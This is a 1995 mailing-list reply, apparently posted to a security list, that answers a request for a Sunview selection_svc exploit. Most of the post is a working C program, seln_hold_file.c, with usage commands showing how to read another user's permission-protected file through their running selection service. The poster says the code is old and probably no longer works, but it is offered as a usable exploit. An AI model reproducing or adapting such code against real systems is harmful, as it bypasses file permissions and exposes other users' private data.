Re: selection_svc exploit?

[jkb () mrc-lmb cam ac uk (Bonfield James)]

Paul "Shag" Walmsley wrote:
> On Thu, 23 Mar 1995, Mike Neuman wrote:
>
> >   Does anyone have a selection_svc exploit? I know what the problem is,
>
> What is the problem?

Well I've got some code that's been kicking around for years (5 or so maybe),
that exploits a Sunview selection_svc problem. I doubt if it's the same bug as
more recent selection_svc holes, but I do wonder whether people ever learn
from past problems. I doubt this code works anymore as I doubt anyone uses
Sunview these days.

Anyway, thanks to James Beckett (Hiya James!) from whom I snarfed this code
oh so long ago. I would leave it up to James to post this code, but I
have a feeling he may not have it anymore.

        James

/* SELN_HOLD_FILE
 * For use where someone has a selection_svc runnning as them, after an
 * invocation of suntools:
 *
 * % cat their_private_file
 * their_private_file: Permission denied
 * % cc seln_hold_file.c -o seln_hold_file -lsuntool -lsunwindow
 * % ./seln_hold_file their_private_file
 * % get_selection 2
 * < contents of their_private_file >
 * %
 */

#include <stdio.h>
#include <sys/types.h>
#include <suntool/seln.h>

main(argc, argv)
  int argc;
  char *argv[];
{
  Seln_result     ret;
  
  if (argc != 2) {
    (void) fprintf(stderr, "usage: seln_grab file1\n");
    exit(1);
  }
  
  ret = seln_hold_file(SELN_SECONDARY, argv[1]);
  seln_dump_result(stdout, &ret);
  printf("\n");
}

/*
 * Local variables:
 * compile-command: "cc -sun3 -Bstatic -o seln_hold_file seln_hold_file.c -lsuntool -lsunwindow"
 * end:
 * 
 * Static required because _mem_ops not included in ld.so
 */